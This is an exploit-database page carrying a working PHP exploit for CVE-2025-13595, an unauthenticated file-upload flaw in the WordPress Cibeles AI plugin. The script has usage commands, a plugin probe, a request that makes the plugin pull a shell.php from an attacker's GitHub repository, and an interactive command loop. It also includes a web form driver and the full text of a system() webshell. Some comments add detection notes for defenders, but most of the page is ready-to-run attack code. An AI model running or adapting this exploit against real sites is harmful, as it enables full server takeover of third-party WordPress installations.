## https://sploitus.com/exploit?id=PACKETSTORM:216516
=============================================================================================================================================
| # Title : WordPress Cibeles AI 1.10.8 Unauthenticated RCE Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://wordpress.org/plugins/cibeles-ai/ |
=============================================================================================================================================
POC :
[+] References : https://packetstorm.news/files/id/212112/ & CVE-2025-13595
[+] Summary :
An unauthenticated arbitrary file upload vulnerability exists in the CIBELES AI plugin for WordPress, versions 1.10.8 and earlier.
The vulnerability allows unauthenticated attackers to upload arbitrary files, including PHP webshells, by exploiting the GitHub integration functionality, leading to remote code execution and complete server compromise.
The vulnerability exists in the actualizador_git.php file which provides unauthenticated access to download and execute files from arbitrary GitHub repositories without proper security controls.
[+] POC :
# Execute a single command
`php cibeles_exploit.php -t https://target.com -o myuser -r myrepo -k ghp_xxx -c 'id'`
# Interactive shell
`php cibeles_exploit.php -t https://target.com -o myuser -r myrepo -k ghp_xxx -i`
# Create a shell for the repo
`php cibeles_exploit.php --create-shell`
<?php
/**
* CIBELES AI <= 1.10.8 - Unauthenticated Arbitrary File Upload RCE Exploit (CVE-2025-13595)
* Author: indoushka
* Vendor: https://ai.cibeles.net/
* Vulnerable Versions: <= 1.10.8
*/
/**
 * Client-side driver for CVE-2025-13595 as published by the original author.
 *
 * All network traffic is plain GET via file_get_contents() with an `http`
 * stream context; every call is `@`-suppressed, so a failed connection or an
 * HTTP error status surfaces only as `false` (the http wrapper's default
 * `ignore_errors` behaviour). Nothing here parses a response body — each
 * method decides success purely on "did the request return anything".
 *
 * For defenders, the paths and query parameters each method requests are
 * listed in the method docblocks; together they form a compact log-matching
 * signature for this particular tool.
 */
class CibelesAIExploit {
    /** @var string Site base URL with any trailing `/` removed. */
    private $target;

    /**
     * @param string $target_url WordPress site URL. A trailing slash is
     *                           stripped so the plugin paths below can be
     *                           appended verbatim.
     */
    public function __construct($target_url) {
        $this->target = rtrim($target_url, '/');
    }

    /**
     * Presence probe: is the plugin reachable on the target?
     *
     * Fetches the plugin directory first and, only if that fails, the
     * updater script `actualizador_git.php` with no query string. Any
     * non-`false` response from either is reported as "likely vulnerable".
     * No version is read, so a patched install answers the same way as an
     * unpatched one; a `true` here means "plugin installed", not
     * "exploitable".
     *
     * Observable footprint: up to two GETs to
     * `/wp-content/plugins/cibeles-ai/` and
     * `/wp-content/plugins/cibeles-ai/actualizador_git.php`, both carrying
     * the fixed User-Agent set in the context below. That UA ends at
     * `AppleWebKit/537.36` with no browser token, which is unusual for a
     * real browser and easy to match in access logs.
     *
     * @return bool true when either URL returned a body.
     */
    public function check_vulnerability() {
        echo "[*] Checking if target is vulnerable...\n";
        // Check if CIBELES AI plugin exists
        $plugin_path = $this->target . '/wp-content/plugins/cibeles-ai/';
        $context = stream_context_create([
            'http' => [
                'method' => 'GET',
                'timeout' => 10,
                // Truncated UA string reused by exploit() and test_shell().
                'user_agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
            ]
        ]);
        // Check for plugin directory
        // `@` hides the warning; a 403/404 on the directory is just `false`.
        $response = @file_get_contents($plugin_path, false, $context);
        if ($response === false) {
            // Check for actualizador_git.php directly
            $exploit_url = $this->target . '/wp-content/plugins/cibeles-ai/actualizador_git.php';
            $response = @file_get_contents($exploit_url, false, $context);
            if ($response !== false) {
                echo "[+] CIBELES AI plugin detected - likely vulnerable\n";
                return true;
            }
        } else {
            echo "[+] CIBELES AI plugin directory found - likely vulnerable\n";
            return true;
        }
        echo "[-] CIBELES AI plugin not found or not accessible\n";
        return false;
    }

    /**
     * Point the plugin's updater at a caller-chosen GitHub repository.
     *
     * Builds `actualizador_git.php?owner=..&repo=..&ref=main&token=..` with
     * http_build_query() and fetches it once. The only success criterion is
     * that the request did not fail outright; the response is printed but
     * never inspected before test_shell() is called, so a WAF block page or
     * a redirect counts as "exploit executed".
     *
     * The GitHub token travels in the query string and is also echoed to
     * stdout on the "[*] URL:" line — it ends up in the target's access log
     * and in the operator's console/scrollback.
     *
     * Observable footprint: a GET to `actualizador_git.php` whose query
     * string contains `owner`, `repo`, `ref` and `token`, immediately
     * followed by a GET to `shell.php?cmd=` (see test_shell()).
     *
     * @param string $owner   GitHub account or organisation name.
     * @param string $repo    Repository name the updater is pointed at.
     * @param string $token   GitHub personal access token, sent unmodified.
     * @param string $command Forwarded to test_shell() after the request.
     * @return bool false only when the HTTP request itself failed.
     */
    public function exploit($owner, $repo, $token, $command = 'whoami') {
        echo "[*] Exploiting actualizador_git.php vulnerability...\n";
        echo "[*] Target: " . $this->target . "\n";
        echo "[*] GitHub Repository: {$owner}/{$repo}\n";
        $exploit_url = $this->target . '/wp-content/plugins/cibeles-ai/actualizador_git.php';
        // `ref` is hard-coded to `main`; the tool cannot target another branch.
        $params = [
            'owner' => $owner,
            'repo' => $repo,
            'ref' => 'main',
            'token' => $token
        ];
        $query_string = http_build_query($params);
        $full_url = $exploit_url . '?' . $query_string;
        echo "[*] Sending exploit request...\n";
        // Prints the full URL including the token.
        echo "[*] URL: " . $full_url . "\n";
        $context = stream_context_create([
            'http' => [
                'method' => 'GET',
                // Longer timeout than the probes: the updater is expected to
                // do work (the writeup says it fetches from GitHub).
                'timeout' => 30,
                'user_agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
            ]
        ]);
        $response = @file_get_contents($full_url, false, $context);
        if ($response === false) {
            echo "[-] Exploit request failed\n";
            return false;
        }
        echo "[+] Exploit executed. Response:\n";
        echo $response . "\n";
        // Test shell access
        echo "\n[*] Testing shell access...\n";
        $this->test_shell($command);
        return true;
    }

    /**
     * Fetch `shell.php?cmd=<command>` under the plugin directory and print
     * the body verbatim.
     *
     * The shell path is fixed to `/wp-content/plugins/cibeles-ai/shell.php`;
     * the writeup expects that file at the root of the `main` branch of the
     * repository used in exploit() (see create_malicious_repo()). The body
     * is echoed without any decoding, so an error page is printed as if it
     * were command output.
     *
     * Observable footprint / response: a `shell.php` inside the plugin
     * directory that is not part of the plugin, and requests to it carrying
     * a `cmd` query parameter.
     *
     * @param string $command URL-encoded into the `cmd` parameter.
     */
    private function test_shell($command) {
        $shell_url = $this->target . '/wp-content/plugins/cibeles-ai/shell.php';
        $test_url = $shell_url . '?cmd=' . urlencode($command);
        echo "[*] Testing command: {$command}\n";
        echo "[*] Shell URL: {$shell_url}?cmd=COMMAND\n";
        $context = stream_context_create([
            'http' => [
                'method' => 'GET',
                'timeout' => 10,
                'user_agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
            ]
        ]);
        $response = @file_get_contents($test_url, false, $context);
        if ($response === false) {
            echo "[-] Shell not accessible or command failed\n";
        } else {
            echo "[+] Command output:\n";
            echo $response . "\n";
        }
    }

    /**
     * Write the webshell used by test_shell() to `shell.php` in the current
     * working directory.
     *
     * The generated file passes `cmd` from either GET or POST straight to
     * system(); its contents are exactly the string literal below, so a file
     * matching that literal byte-for-byte is the unmodified shell. The
     * return value of file_put_contents() is not checked, so the success
     * message prints even when the write failed.
     */
    public function create_malicious_repo() {
        echo "[*] Creating malicious shell.php for GitHub repository...\n";
        // Multi-line literal: the lines below are the file's exact bytes.
        $shell_content = '<?php
if(isset($_GET[\'cmd\'])) {
system($_GET[\'cmd\']);
echo "\n";
}
if(isset($_POST[\'cmd\'])) {
system($_POST[\'cmd\']);
echo "\n";
}
?>';
        file_put_contents('shell.php', $shell_content);
        echo "[+] Created shell.php - upload this to your GitHub repository\n";
        echo "[+] Repository structure should be: /shell.php in main branch\n";
    }

    /**
     * Read commands from STDIN until `exit` and relay each to shell.php.
     *
     * Same URL pattern as test_shell() (`shell.php?cmd=`), but the stream
     * context here sets no `user_agent`, so these requests go out with
     * PHP's default (php.ini `user_agent`, often absent) instead of the
     * Mozilla string used elsewhere — a second distinguishing detail in
     * access logs.
     *
     * Known quirks: fgets(STDIN) returns false at EOF, which trim() turns
     * into '' (no strict_types declared), so with a closed or piped stdin
     * the loop keeps re-printing the prompt instead of exiting; and
     * `!empty($command)` also discards the literal command `0`.
     */
    public function interactive_shell() {
        $shell_url = $this->target . '/wp-content/plugins/cibeles-ai/shell.php';
        echo "[+] Starting interactive shell...\n";
        echo "[+] Shell URL: {$shell_url}\n";
        echo "[+] Type 'exit' to quit\n\n";
        while (true) {
            echo "cmd> ";
            $command = trim(fgets(STDIN));
            if ($command === 'exit') {
                break;
            }
            if (!empty($command)) {
                $test_url = $shell_url . '?cmd=' . urlencode($command);
                $context = stream_context_create([
                    'http' => [
                        'method' => 'GET',
                        'timeout' => 10
                    ]
                ]);
                $response = @file_get_contents($test_url, false, $context);
                if ($response !== false) {
                    echo $response . "\n";
                } else {
                    echo "[-] Command failed or shell not accessible\n";
                }
            }
        }
    }
}
// Command line interface
//
// Entry point. The mode is chosen by SAPI: a getopt()-driven CLI when run as
// `php cibeles_exploit.php ...`, otherwise a self-posting HTML form. Neither
// mode authenticates whoever is driving it, so the web branch turns any host
// this file is dropped on into an open relay for the exploit — a stray copy
// of this script under a web root is worth treating as an incident by itself.
if (php_sapi_name() === 'cli') {
    // Banner. The block-drawing glyphs look mis-encoded in this copy of the
    // file (they render as U+0E42); they are printed exactly as stored.
    echo "
โโโโโโโ โโโโโโโโโโ โโโโโโโ โโโ โโโโโโโโโโโโโโ โโโโโโ โโโ โโโโโโ
โโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโ โโโโโโ โโโโโโโโโโโโ
โโโโโโโโโ โโโโโ โโโโโโ โโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโ
โโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโ โโโโโโ โโโ
โโโโโโ โโโโโโโโโโโโ โโโโโโโ โโโโโโโ โโโโโโโโโโโ โโโโโโ โโโโโโ โโโ
CIBELES AI <= 1.10.8 Unauthenticated RCE Exploit (CVE-2025-13595)
By: indoushka
\n";
    // Short and long forms are both accepted. getopt() silently drops
    // unrecognised options and stops at the first non-option argument;
    // `--create-shell` has no short alias.
    $options = getopt("t:o:r:k:c:ih", [
        "target:",
        "owner:",
        "repo:",
        "token:",
        "command:",
        "interactive",
        "help",
        "create-shell"
    ]);
    // Usage is also printed when no arguments at all were given ($argc == 1).
    if (isset($options['h']) || isset($options['help']) || $argc == 1) {
        echo "Usage: php cibeles_exploit.php [options]\n";
        echo "Options:\n";
        echo " -t, --target Target URL (required)\n";
        echo " -o, --owner GitHub repository owner (required)\n";
        echo " -r, --repo GitHub repository name (required)\n";
        echo " -k, --token GitHub Personal Access Token (required)\n";
        echo " -c, --command Command to execute (default: whoami)\n";
        echo " -i, --interactive Start interactive shell\n";
        echo " --create-shell Create malicious shell.php for GitHub repo\n";
        echo " -h, --help Show this help message\n";
        echo "\nExamples:\n";
        echo " php cibeles_exploit.php -t https://target.com -o myuser -r myrepo -k ghp_xxx -c 'id'\n";
        echo " php cibeles_exploit.php -t https://target.com -o myuser -r myrepo -k ghp_xxx -i\n";
        echo " php cibeles_exploit.php --create-shell\n";
        exit(1);
    }
    // Local-only mode: no target is needed, only `shell.php` is written to
    // the current directory.
    if (isset($options['create-shell'])) {
        $exploit = new CibelesAIExploit('');
        $exploit->create_malicious_repo();
        exit(0);
    }
    // Each required option may be given in short or long form.
    if (!isset($options['t']) && !isset($options['target'])) {
        echo "Error: Target URL is required\n";
        exit(1);
    }
    if (!isset($options['o']) && !isset($options['owner'])) {
        echo "Error: GitHub owner is required\n";
        exit(1);
    }
    if (!isset($options['r']) && !isset($options['repo'])) {
        echo "Error: GitHub repository is required\n";
        exit(1);
    }
    if (!isset($options['k']) && !isset($options['token'])) {
        echo "Error: GitHub token is required\n";
        exit(1);
    }
    // When both forms are present the short one wins.
    $target = isset($options['t']) ? $options['t'] : $options['target'];
    $owner = isset($options['o']) ? $options['o'] : $options['owner'];
    $repo = isset($options['r']) ? $options['r'] : $options['repo'];
    $token = isset($options['k']) ? $options['k'] : $options['token'];
    $command = isset($options['c']) ? $options['c'] : (isset($options['command']) ? $options['command'] : 'whoami');
    $exploit = new CibelesAIExploit($target);
    // Check vulnerability first
    // This is only a presence probe (see check_vulnerability()); it does not
    // confirm the version, so a patched site can still pass this gate.
    if (!$exploit->check_vulnerability()) {
        echo "[-] Target does not appear to be vulnerable\n";
        exit(1);
    }
    if (isset($options['i']) || isset($options['interactive'])) {
        // Execute exploit then start interactive shell
        // The first request uses a fixed marker command; exploit()'s return
        // value is ignored, so the loop starts even if that request failed.
        $exploit->exploit($owner, $repo, $token, 'echo "Shell installed successfully"');
        $exploit->interactive_shell();
    } else {
        // Single command execution
        $exploit->exploit($owner, $repo, $token, $command);
    }
} else {
    // Web interface
    // Reached under any non-CLI SAPI. There is no authentication and no CSRF
    // token; the hidden `exploit=1` field in the form is the only trigger.
    if (isset($_POST['exploit'])) {
        $target = $_POST['target'] ?? '';
        $owner = $_POST['owner'] ?? '';
        $repo = $_POST['repo'] ?? '';
        $token = $_POST['token'] ?? '';
        $command = $_POST['command'] ?? 'whoami';
        // Truthiness check: a field whose value is '0' is treated as missing.
        if ($target && $owner && $repo && $token) {
            $exploit = new CibelesAIExploit($target);
            // Everything the two calls echo — including the target's raw
            // response bodies — is captured and written into the page below
            // without htmlspecialchars(). A target that answers with HTML or
            // script therefore gets it rendered in the operator's browser.
            ob_start();
            $exploit->check_vulnerability();
            $exploit->exploit($owner, $repo, $token, $command);
            $output = ob_get_clean();
            echo "<pre>$output</pre>";
        } else {
            echo "<div style='color: red;'>All fields are required</div>";
        }
    } else {
        // Static form; it re-posts to the same URL.
        echo '<!DOCTYPE html>
<html>
<head>
<title>CIBELES AI RCE Exploit</title>
<style>
body { font-family: Arial, sans-serif; margin: 40px; }
.container { max-width: 600px; margin: 0 auto; }
.form-group { margin-bottom: 15px; }
label { display: block; margin-bottom: 5px; font-weight: bold; }
input[type="text"], input[type="password"] {
width: 100%; padding: 8px; border: 1px solid #ddd; border-radius: 4px;
}
button {
background: #007cba; color: white; padding: 10px 20px;
border: none; border-radius: 4px; cursor: pointer;
}
.help { font-size: 12px; color: #666; margin-top: 5px; }
</style>
</head>
<body>
<div class="container">
<h1>CIBELES AI RCE Exploit (CVE-2025-13595)</h1>
<form method="post">
<input type="hidden" name="exploit" value="1">
<div class="form-group">
<label for="target">Target URL:</label>
<input type="text" id="target" name="target" placeholder="https://example.com" required>
<div class="help">Full URL of the WordPress site</div>
</div>
<div class="form-group">
<label for="owner">GitHub Owner:</label>
<input type="text" id="owner" name="owner" placeholder="yourusername" required>
<div class="help">GitHub username or organization name</div>
</div>
<div class="form-group">
<label for="repo">GitHub Repository:</label>
<input type="text" id="repo" name="repo" placeholder="malicious-repo" required>
<div class="help">Repository containing shell.php</div>
</div>
<div class="form-group">
<label for="token">GitHub Token:</label>
<input type="password" id="token" name="token" placeholder="ghp_xxx" required>
<div class="help">GitHub Personal Access Token with repo access</div>
</div>
<div class="form-group">
<label for="command">Command:</label>
<input type="text" id="command" name="command" value="whoami">
<div class="help">Command to execute on target</div>
</div>
<button type="submit">Execute Exploit</button>
</form>
<div style="margin-top: 30px; padding: 15px; background: #f5f5f5; border-radius: 4px;">
<h3>Setup Instructions:</h3>
<ol>
<li>Create a GitHub repository with a shell.php file</li>
<li>Generate a GitHub Personal Access Token with repo permissions</li>
<li>Fill in the form above and execute</li>
</ol>
</div>
</div>
</body>
</html>';
    }
}
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================